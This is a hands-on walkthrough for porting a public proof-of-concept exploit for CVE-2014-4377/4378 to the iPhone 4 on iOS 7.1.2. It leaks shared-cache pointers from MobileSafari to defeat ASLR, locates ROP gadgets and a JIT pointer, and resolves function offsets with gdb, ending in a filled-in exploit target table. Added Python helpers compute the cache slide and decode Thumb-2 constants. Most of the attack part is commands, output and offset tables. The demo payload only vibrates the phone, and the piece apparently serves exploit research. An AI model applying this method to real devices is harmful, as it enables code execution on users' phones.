Porting the PoC exploit for CVE-2014-4377 and CVE-2014-4378 to the iPhone 4 with firmware version iOS 7.1.2.

This is a worked exercise following the PORTING instructions detailed here.

First get the dyld_shared_cache of the target (every offset below is computed against this one file, so note its size and hash):

iPhone3,1_7.1.2_11D257 $ scp root@$IPHONE4:/System/Library/Caches/com.apple.dyld/dyld_shared_cache_armv7 .

iPhone3,1_7.1.2_11D257 $ ls -al dyld_shared_cache_armv7
-rw-r--r-- 1 felipe felipe 315952666 Sep 23 00:05 dyld_shared_cache_armv7

iPhone3,1_7.1.2_11D257 $ sha1sum dyld_shared_cache_armv7
21062c1351606d71f168398d3ad8ed8035c040cd  dyld_shared_cache_armv7

Navigate to the exploit

Open MobileSafari on the device and navigate to the exploit page (the online version works). It will fail, since this device/firmware is not in its target table yet, but it shows useful info: scroll down a little and find the hex dump of three similar-looking pointers. In this case they are:
71 45 27 2f c5 45 27 2f c5 46 27 2f

These are little-endian pointers into the shared cache (0x2f274571, 0x2f2745c5, 0x2f2746c5) and they vary with device, firmware and boot: the upper bytes move with the cache's ASLR slide, while the low bytes (0x71, 0xc5, 0xc5) stay fixed because the slide is page aligned, which is what the byte0/byte1/byte2 keys of the target table rely on.

Calculate the base address

Download and use calcbase.py
iPhone3,1_7.1.2_11D257 $ wget https://raw.githubusercontent.com/feliam/CVE-2014-4378/master/tools/calcbase.py
--2014-10-06 23:57:15--  https://raw.githubusercontent.com/feliam/CVE-2014-4378/master/tools/calcbase.py
Resolving raw.githubusercontent.com... 23.235.39.133
Connecting to raw.githubusercontent.com|23.235.39.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 948 [text/plain]
Saving to: ‘calcbase.py’

100%[============================================================================================================>] 948         --.-K/s   in 0s      

2014-10-06 23:57:16 (47.7 MB/s) - ‘calcbase.py’ saved [948/948]

and calculate the live base of the dyld_shared_cache like this:

$ python calcbase.py dyld_shared_cache_armv7 71 45 27 2f c5 45 27 2f c5 46 27 2f
Live Pointers 0x2f274571 0x2f2745c5 0x2f2746c5 
Possible dyld_shared_cache base: 0x2dcdc000
{ "byte0": 0x71, "byte1": 0xc5, "byte2": 0xc5, 
                                                    "version": "$VERSION$", 
                                                    "dyld_shared_cache_offset": 0x01598571 },

Now look for the _trargets dictionary in CVE-2014-4378/index.html and append the new target printed above, with $VERSION$ replaced by iPhone4-7.1.2:

{ "byte0": 0x71, "byte1": 0xc5, "byte2": 0xc5, 
                        "version": "iPhone4-7.1.2", 
                        "dyld_shared_cache_offset": 0x01598571 },
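
The following Python is an added example, not calcbase.py or any other code from the repository. It shows the arithmetic behind that output and behind the "offset + dyld_shared_cache" entries used further down this page: it parses the dyld_v1 cache header and its mapping table, derives the ASLR slide and live base from one leaked pointer whose file offset is known, translates file offsets to live addresses mapping by mapping (file offset and memory offset coincide only inside the first, __TEXT, mapping), and reproduces the gdb trick used later of walking back a page at a time until the header magic appears. The header layout is the real one; the miniature cache it builds, its mapping addresses and sizes, and the fake memory reader are constructed for the demo, while the pointers and offsets fed in are the ones quoted on this page.

```python
"""dyld_shared_cache base/offset arithmetic (added example, not calcbase.py).

Header layout follows the real dyld_v1 format: 16-byte magic, then mappingOffset and
mappingCount (uint32), then dyld_cache_mapping_info entries of
{uint64 address, size, fileOffset; uint32 maxProt, initProt}.  build_fake_cache()
uses that layout with invented geometry; the values in demo() are from the page.
"""
import struct

PAGE = 0x1000
VM_PROT_EXECUTE = 0x4


def parse_cache_header(data):
    """Return (magic, mappings); a mapping is (address, size, file_offset, max_prot, init_prot)."""
    magic = data[:16].split(b"\0", 1)[0]
    if not magic.startswith(b"dyld_v1"):
        raise ValueError("not a dyld_v1 shared cache: %r" % magic)
    mapping_offset, mapping_count = struct.unpack_from("<II", data, 16)
    return magic, [struct.unpack_from("<QQQII", data, mapping_offset + 32 * i)
                   for i in range(mapping_count)]


def mapping_for_offset(mappings, off):
    for m in mappings:
        if m[2] <= off < m[2] + m[1]:
            return m
    raise ValueError("file offset 0x%x lies in no mapping" % off)


def unslid_address(mappings, off):
    """File offset -> unslid virtual address, honouring the mapping table."""
    address, _, file_offset, _, _ = mapping_for_offset(mappings, off)
    return address + (off - file_offset)


def slide_from_leak(mappings, leaked_ptr, off):
    """ASLR slide from one live pointer and the file offset of what it points at.
    Both values carry the same Thumb bit (or none), so a consistent pair yields a
    page-aligned slide; anything else means the pointer/offset pairing is wrong."""
    slide = leaked_ptr - unslid_address(mappings, off)
    if slide < 0 or slide % PAGE:
        raise ValueError("slide 0x%x is not a page multiple: pointer/offset mismatch" % slide)
    return slide


def live_base(mappings, slide):
    """The 'dyld_shared_cache' value the exploit adds to every offset (first mapping is __TEXT)."""
    return mappings[0][0] + slide


def live_address(mappings, slide, off):
    return unslid_address(mappings, off) + slide


def is_executable(mappings, off):
    return bool(mapping_for_offset(mappings, off)[4] & VM_PROT_EXECUTE)


def file_offset_of(mappings, slide, live_ptr):
    """Inverse of live_address: what the gdb printf on the page computes."""
    unslid = live_ptr - slide
    for address, size, file_offset, _, _ in mappings:
        if address <= unslid < address + size:
            return file_offset + (unslid - address)
    raise ValueError("0x%x is outside the cache" % live_ptr)


def find_live_base(read, addr, max_pages=0x20000):
    """The gdb while-loop from the page: from a known live address walk back one page
    at a time until a page starts with the cache magic.  `read(addr, n)` returns n
    bytes; in demo() it is backed by a fake memory image."""
    pos = addr & ~(PAGE - 1)
    for _ in range(max_pages):
        if read(pos, 7) == b"dyld_v1":
            return pos
        pos -= PAGE
    raise LookupError("no dyld_v1 header found below 0x%x" % addr)


def build_fake_cache():
    """Constructed miniature cache: real header layout, invented addresses and sizes."""
    mappings = [
        (0x2c000000, 0x0d000000, 0x00000000, 5, 5),   # __TEXT     r-x
        (0x3a000000, 0x01000000, 0x0d000000, 3, 3),   # __DATA     rw-
        (0x3c000000, 0x00800000, 0x0e000000, 1, 1),   # __LINKEDIT r--
    ]
    header = b"dyld_v1   armv7".ljust(16, b"\0") + struct.pack("<II", 0x40, len(mappings))
    return header.ljust(0x40, b"\0") + b"".join(struct.pack("<QQQII", *m) for m in mappings)


def demo():
    data = build_fake_cache()
    _, mappings = parse_cache_header(data)
    # calcbase.py step: leaked pointer 0x2f274571 is file offset 0x01598571 (page values).
    slide = slide_from_leak(mappings, 0x2f274571, 0x01598571)
    base = live_base(mappings, slide)
    # gdb step: AudioServicesPlaySystemSound was at 0x2eac1d94 in the same boot.
    # Fake memory: only the header bytes are backed, everything else reads as zeros.
    mem = lambda a, n: data[a - base:a - base + n] if base <= a < base + len(data) else b"\0" * n
    return {
        "slide": slide,
        "base": base,
        "scanned_base": find_live_base(mem, 0x2eac1d94),
        "aspss_off": file_offset_of(mappings, slide, 0x2eac1d94),
        "gadget4_live": live_address(mappings, slide, 0x0c23ae48) | 1,   # Thumb bit set
        "gadget4_exec": is_executable(mappings, 0x0c23ae48),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-13s %s" % (key, value if isinstance(value, bool) else hex(value)))
```

The page-alignment check in slide_from_leak is the sanity test to apply when a candidate base looks wrong: a slide that is not a multiple of 0x1000 means the leaked pointer and the file offset do not refer to the same object, or one of them carries a Thumb bit the other lacks. The mapping-aware translation matters for anything outside __TEXT, where "file offset + base" is not the live address.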

Search for the ROP gadgets

We need a set of ROP gadgets for the vibrate payload, a chain that ends up calling AudioServicesPlaySystemSound and then exit. The result goes into the per-version table in CVE-2014-4377/mkCrash.py. Download gadgets.py like this:

iPhone3,1_7.1.2_11D257 $ wget https://raw.githubusercontent.com/feliam/CVE-2014-4378/master/tools/gadgets.py
--2014-10-07 00:15:48--  https://raw.githubusercontent.com/feliam/CVE-2014-4378/master/tools/gadgets.py
Resolving raw.githubusercontent.com... 23.235.39.133
Connecting to raw.githubusercontent.com|23.235.39.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4416 (4.3K) [text/plain]
Saving to: ‘gadgets.py’

100%[============================================================================================================>] 4,416       --.-K/s   in 0.002s  

2014-10-07 00:15:49 (1.72 MB/s) - ‘gadgets.py’ saved [4416/4416]

then run it...

iPhone3,1_7.1.2_11D257 $ python gadgets.py dyld_shared_cache_armv7
To get JIT pointer address disassembled the following binary code (http://onlinedisassembler.com/odaweb/) 
    4ff60420c0f61c20
Get $CONSTANT$ from the disassembly and do the following calculation:
    hex( $CONSTANT$ + 0x023c2bac)

              "$VERSION$" : {   "gadget0": 0x0c23d008 + dyld_shared_cache,
                                "gadget1": 0x015b7d47 + dyld_shared_cache,
                                "gadget2": 0x002f70ff + dyld_shared_cache,
                                "gadget3": 0x00118e6b + dyld_shared_cache,
                                "gadget4": 0xffffffff + dyld_shared_cache,
                                "gadget5": 0x016070a5 + dyld_shared_cache,
                                "jit": 0x41414141 + dyld_shared_cache,
                                "AudioServicesPlaySystemSound":  0x42424242 + dyld_shared_cache,
                                "exit":  0x43434343 + dyld_shared_cache,
                                 },

Fix the JIT pointer

Keep that table aside for a minute and disassemble the code 4ff60420c0f61c20 as Thumb-2 (with the online disassembler, or any ARM disassembler). It is a MOVW/MOVT pair that loads a 32-bit constant into r0: movw r0, #0xfa04 followed by movt r0, #0xa1c.

Thus $CONSTANT$ is 0x0a1cfa04, so the JIT entry should be 0x0a1cfa04 + 0x023c2bac:

iPhone3,1_7.1.2_11D257 $ python -c "print hex(0xa1cfa04 + 0x023c2bac)"
0xc5925b0
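
As an added example (not code from the repository), here is a small decoder for that MOVW/MOVT pair, so the constant can be recovered from the hex string gadgets.py prints without an online disassembler. It handles only the two Thumb-2 encodings involved (MOVW T3 and MOVT T1), which is all this sequence needs; the 0x023c2bac delta is the one this gadgets.py run printed and is passed in as a parameter rather than assumed.

```python
"""Decode the 'movw rN, #lo ; movt rN, #hi' pair gadgets.py asks you to
disassemble (added example; not part of the CVE-2014-4377/4378 repository).

Thumb-2 encodings handled (little-endian halfwords hw1, hw2):
  MOVW (T3): hw1 = 11110 i 10 0 100 imm4   hw2 = 0 imm3 Rd imm8
  MOVT (T1): hw1 = 11110 i 10 1 100 imm4   hw2 = 0 imm3 Rd imm8
  imm16 = imm4:i:imm3:imm8
"""
import struct

MOV_IMM16_MASK, MOV_IMM16_BITS = 0xfb70, 0xf240   # fixed bits of hw1, same for both forms


def decode_mov_imm16(hw1, hw2):
    """Decode one MOVW/MOVT instruction; returns (mnemonic, rd, imm16)."""
    if (hw1 & MOV_IMM16_MASK) != MOV_IMM16_BITS or (hw2 & 0x8000):
        raise ValueError("not a MOVW/MOVT encoding: %04x %04x" % (hw1, hw2))
    i = (hw1 >> 10) & 1
    is_movt = (hw1 >> 7) & 1          # bit 7 of hw1 selects MOVT over MOVW
    imm4 = hw1 & 0xf
    imm3 = (hw2 >> 12) & 7
    rd = (hw2 >> 8) & 0xf
    imm8 = hw2 & 0xff
    imm16 = (imm4 << 12) | (i << 11) | (imm3 << 8) | imm8
    return ("movt" if is_movt else "movw", rd, imm16)


def disassemble_mov_pair(hexstr):
    """Decode the 8-byte hex string as two Thumb-2 instructions.
    Returns (rd, value, text) where value is the 32-bit constant left in rd."""
    code = bytes.fromhex(hexstr)
    if len(code) != 8:
        raise ValueError("expected 8 bytes (two 32-bit Thumb-2 instructions)")
    hw = struct.unpack("<4H", code)            # Thumb code is stored as LE halfwords
    lo = decode_mov_imm16(hw[0], hw[1])
    hi = decode_mov_imm16(hw[2], hw[3])
    if (lo[0], hi[0]) != ("movw", "movt") or lo[1] != hi[1]:
        raise ValueError("expected movw rN, #lo ; movt rN, #hi, got %r %r" % (lo, hi))
    rd = lo[1]
    value = (hi[2] << 16) | lo[2]
    text = "movw r%d, #0x%x ; movt r%d, #0x%x" % (rd, lo[2], rd, hi[2])
    return rd, value, text


def jit_offset(hexstr, delta):
    """The calculation gadgets.py asks for: hex($CONSTANT$ + delta)."""
    return disassemble_mov_pair(hexstr)[1] + delta


if __name__ == "__main__":
    code = "4ff60420c0f61c20"                  # as printed by gadgets.py on this page
    rd, value, text = disassemble_mov_pair(code)
    print(text)                                 # movw r0, #0xfa04 ; movt r0, #0xa1c
    print("$CONSTANT$ = 0x%08x" % value)        # 0x0a1cfa04
    print("jit offset  = 0x%08x" % jit_offset(code, 0x023c2bac))   # 0x0c5925b0
```

The mask check rejects anything that is not a MOVW/MOVT, so if a future gadgets.py run prints a different instruction sequence the script fails loudly instead of returning a plausible-looking wrong constant.
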
Replacing $VERSION$ and the calculated JIT pointer, so far we have:
              "iPhone4-7.1.2" : {
                                "gadget0": 0x0c23d008 + dyld_shared_cache,
                                "gadget1": 0x015b7d47 + dyld_shared_cache,
                                "gadget2": 0x002f70ff + dyld_shared_cache,
                                "gadget3": 0x00118e6b + dyld_shared_cache,
                                "gadget4": 0xffffffff + dyld_shared_cache,
                                "gadget5": 0x016070a5 + dyld_shared_cache,
                                "jit": 0xc5925b0 + dyld_shared_cache,
                                "AudioServicesPlaySystemSound":  0x42424242 + dyld_shared_cache,
                                "exit":  0x43434343 + dyld_shared_cache,
                                 },

Offsets for AudioServicesPlaySystemSound and exit

We still need the offsets of AudioServicesPlaySystemSound and exit (the 0x42424242 and 0x43434343 placeholders), and gadget4 came out as the 0xffffffff placeholder too, so it also has to be resolved by hand. This is easy to do with IDA on the cache file, or with gdb on the device plus some offset arithmetic.

I'll go the gdb way this time.

iPhone3,1_7.1.2_11D257 $ ssh root@192.168.1.103
root@192.168.1.103's password: 

iphone4:~ root# ./gdb.iphone4 
GNU gdb 6.3.50-20050815 (Apple version gdb-1821) (Fri Jun 29 08:41:41 UTC 2012)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "arm-apple-darwin".

(gdb) attach MobileSafari
Attaching to process 329.
Reading symbols for shared libraries . done
bfd_mach_o_scan: unknown architecture 0x100000c/0x0
Reading symbols for shared libraries ................................................................................................................................................................................................................ done
bfd_mach_o_scan: unknown architecture 0x100000c/0x0
Reading symbols for shared libraries + done
0x39ea1a58 in mach_msg_trap ()

(gdb) p AudioServicesPlaySystemSound
$1 = {} 0x2eac1d94 

(gdb) set $pos=(unsigned)AudioServicesPlaySystemSound&0xfffff000

(gdb) while ( (int) strncasecmp("dyld_v1", $pos, 7) !=0 )
 >set $pos=$pos-0x1000
 >end

(gdb) printf "AudioServicesPlaySystemSound offset: 0x%08x\n", (AudioServicesPlaySystemSound-$pos)|1
AudioServicesPlaySystemSound offset: 0x00de5d95

(gdb) printf "exit offset: 0x%08x\n", (exit-$pos)|1
exit offset: 0x0c149a5d

(gdb) printf "gadget4: 0x%08x\n", (0x39f16e48-$pos)|1
gadget4: 0x0c23ae49


(gdb) detach 
Detaching from process 329.

(gdb) quit
iphone4:~ root# 

Result

The gdb while-loop walks back from AudioServicesPlaySystemSound one page at a time until it hits the dyld_v1 magic, i.e. the live base of the shared cache, and every offset is then just address minus that base. Here it lands on 0x2dcdc000 (0x2eac1d94 - 0x00de5d94), the same base calcbase.py derived from the leaked pointers; that only holds while the device has not rebooted, since the slide changes on every boot, but the offsets do not. gadget4 was converted the same way from the live address 0x39f16e48 (how that address was located is not shown here).

Note that the table below keeps the Thumb bit on gadget4 (0x0c23ae49) but stores AudioServicesPlaySystemSound and exit without the bit the gdb printf ORed in (0x00de5d94 and 0x0c149a5c rather than 0x00de5d95 and 0x0c149a5d). Check how mkCrash.py consumes those two entries before relying on the chain branching into them in Thumb state.

And the final product is:

{ "byte0": 0x71, "byte1": 0xc5, "byte2": 0xc5, 
                        "version": "iPhone4-7.1.2", 
                        "dyld_shared_cache_offset": 0x01598571 },
              "iPhone4-7.1.2" : {
                                "gadget0": 0x0c23d008 + dyld_shared_cache,
                                "gadget1": 0x015b7d47 + dyld_shared_cache,
                                "gadget2": 0x002f70ff + dyld_shared_cache,
                                "gadget3": 0x00118e6b + dyld_shared_cache,
                                "gadget4": 0x0c23ae49 + dyld_shared_cache,
                                "gadget5": 0x016070a5 + dyld_shared_cache,
                                "jit": 0xc5925b0 + dyld_shared_cache,
                                "AudioServicesPlaySystemSound":  0x00de5d94 + dyld_shared_cache,
                                "exit":  0x0c149a5c + dyld_shared_cache,
                                 },

For more info on this check the blog post.

@feliam